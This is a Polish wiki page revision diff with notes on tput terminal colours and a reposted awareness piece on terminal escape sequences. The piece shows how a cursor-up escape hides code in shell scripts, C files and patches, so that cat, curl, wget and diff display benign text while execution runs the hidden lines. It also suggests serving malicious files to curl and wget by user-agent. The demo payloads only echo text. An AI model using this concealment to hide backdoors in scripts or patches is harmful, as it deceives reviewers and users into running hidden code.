Różnice

Różnice między wybraną wersją a wersją aktualną.

--- linux:bash [2014/10/28 09:16] – flamenco
+++ linux:bash [2022/05/22 10:38] (aktualna) – edycja zewnętrzna 127.0.0.1
@@ Linia 1: / Linia 1: @@
 ====== BASH i okolice ======
-===== Kolorowanie tekstu w terminalu =====
+===== Kolorowanie tekstu w terminalu i inne tamże sztuczki =====
 Here is some more detail on the awesome tput command suggested in Ignacio's answer.
 ==== Colour commands ====
 <code>
-tput setab [1-7] # Set the background colour using ANSI escape
+# Set the background colour using ANSI escape
-tput setaf [1-7] # Set the foreground colour using ANSI escape
+tput setab [1-7]
+# Set the foreground colour using ANSI escape
+tput setaf [1-7]
 </code>
 Colours are as follows:
@@ Linia 21: / Linia 24: @@
     white     COLOR_WHITE     max,max,max
 </code>
-There are also non-ANSI versions of the colour setting functions (setb instead of setab, and setf instead of setaf) which use different numbers, not given here.
+There are also non-ANSI versions of the colour setting functions (''setb'' instead of ''setab'', and ''setf'' instead of ''setaf'') which use different numbers, not given here.
 ==== Text mode commands ====
@@ Linia 60: / Linia 63: @@
 tput bel     # play a bell
 </code>
-With compiz wobbly windows, the bel command makes the terminal wobble for a second to draw the user's attention.
+With [[https://extensions.gnome.org/extension/669/wobbly-windows/|compiz wobbly windows]], the ''bel'' command makes the terminal wobble for a second to draw the user's attention.
 ==== Example usage ====
@@ Linia 68: / Linia 71: @@
 Looks like this on my Ubuntu terminal:
-''Red text and white background''
 {{:linux:4stug.png?200|}}
-Screenshot of colour terminal text
-Use command sgr 0 to reset the colour at the end.
-Performing multiple operations at once
+Use command ''sgr 0'' to reset the colour at the end.
-tput accepts scripts containing one command per line, which are executed in order before tput exits.
+==== Performing multiple operations at once ====
-Avoid temporary files by echoing a multiline string and piping it:
+''tput'' accepts scripts containing one command per line, which are executed in order before tput exits.
+Avoid temporary files by echoing a multiline string and piping it:
+<code>
 echo -e "setf 7\nsetb 1" | tput -S  # set fg white and bg red
-See also
+</code>
+==== See also ====
+  * See ''[[http://unixhelp.ed.ac.uk/CGI/man-cgi?tput+1|man 1 tput]]''
+  * See ''[[http://www.manpagez.com/man/5/terminfo/|man 5 terminfo]]'' for the complete list of commands and more details on these options. (The corresponding tput command is listed in the Cap-name column of the huge table that starts at line 81.)
+===== Backup bashem =====
+http://www.cyberciti.biz/faq/how-to-wakeup-backup-nas-server-and-mirror-files-using-rsync-in-linux/
+===== Ciekawostki =====
+==== Federico Bento ''Terminal escape sequences'' ====
+So recently i've encountered a post by Kurt Seifried of RedHat on  oss-sec's mailing list entitled //[[http://www.openwall.com/lists/oss-security/2015/08/11/8|"Terminal escape sequences - the new  XSS for admins?"]]//
+This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.
+How it technically works:
+A terminal escape sequence is a special sequence of characters that is printed (like any other text).
+If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.
+While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.
+<code bash>
+$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho
+doing something very nice!\n' > backdoor.sh
+$ chmod +x backdoor.sh
+$ cat backdoor.sh
+#!/bin/bash
+echo doing something very nice!
+$ ./backdoor.sh
+doing something evil!
+</code>
+As you can see, our beloved ''cat'' cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence **''\033[XA''** (being ''X'' the number of times) performed some action. And this action moves the cursor up ''X'' times, overwriting what is above it ''X'' lines. But this doesn't affect only '**cat**', it affects everything that
+interprets escape sequences.
+<code bash>
+$ head backdoor.sh
+#!/bin/bash
+echo doing something very nice!
+$ tail backdoor.sh
+#!/bin/bash
+echo doing something very nice!
+$ more backdoor.sh
+#!/bin/bash
+echo doing something very nice!
+</code>
+It's not over yet!
+<code bash>
+$ curl 127.0.0.1/backdoor.sh
+#!/bin/bash
+echo doing something very nice!
+$ wget -qO - 127.0.0.1/backdoor.sh
+#!/bin/bash
+echo doing something very nice!
+</code>
+But if we pipe it into a shell...
+<code bash>
+$ curl -s 127.0.0.1/backdoor.sh|sh
+doing something evil!
+$ wget -qO - 127.0.0.1/backdoor.sh|sh
+doing something evil!
+</code>
+You might be thinking //"If I opened that in my browser, I would detect it being malicious!"//
+Well, think again...
+One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then.
+I wouldn't even be surprised if most of those install scripts that make use of these ''pipe into sh'' bullcrap abused this.
+I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files...
+It's no secret, most of us rely on ''cat'' to view files. I guess this is one black kitty, giving you bad luck.
+Here's another example with a ''.c'' file
+<code c>
+$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing
+something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do
+much... */\n\tprintf("doing something very nice\\n");\n\treturn
+;\n}\n' > nice.c
+$ cat nice.c
+#include <stdio.h>
+int main()
+{
+	/* This simple program doesnt do much... */
+	printf("doing something very nice\n");
+	return 0;
+}
+</code>
+<code bash>
+$ gcc nice.c
+$ ./a.out
+doing something evil
+doing something very nice
+</code>
+''diff'' also interprets escape sequences and so do the resulting patches
+Going back to the first example, imagine I have a ''backdoored.sh'' that is backdoored, and a legit.sh that does what it's output tells us.
+<code bash>
+$ cat backdoor.sh #evil file
+#!/bin/bash
+echo doing something very nice!
+$ cat legit.sh #actually echoes doing something very nice!
+#!/bin/bash
+echo doing something very nice!
+$ diff -Naur backdoor.sh legit.sh
+--- backdoor.sh	2015-09-17 16:25:42.985349535 +0100
++++ legit.sh	2015-09-17 16:26:14.950158635 +0100
+@@ -1,4 +1,2 @@
+  #!/bin/bash
+-echo doing something very nice!
++echo doing something very nice!
+$ diff -Naur backdoor.sh legit.sh > file.patch
+$ patch legit.sh -R file.patch
+$ chmod +x legit.sh
+$ ./legit.sh
+doing something evil!
+</code>
+=== Hint: ===
+''less'' doesn't interpret escape sequences unless the ''-r'' switch is used, so stop aliasing it to ''less -r'' just because there's no colored output.
+s/party/hack like it's 1999
-See man 1 tput
-See man 5 terminfo for the complete list of commands and more details on these options. (The corresponding tput command is listed in the Cap-name column of the huge table that starts at line 81.)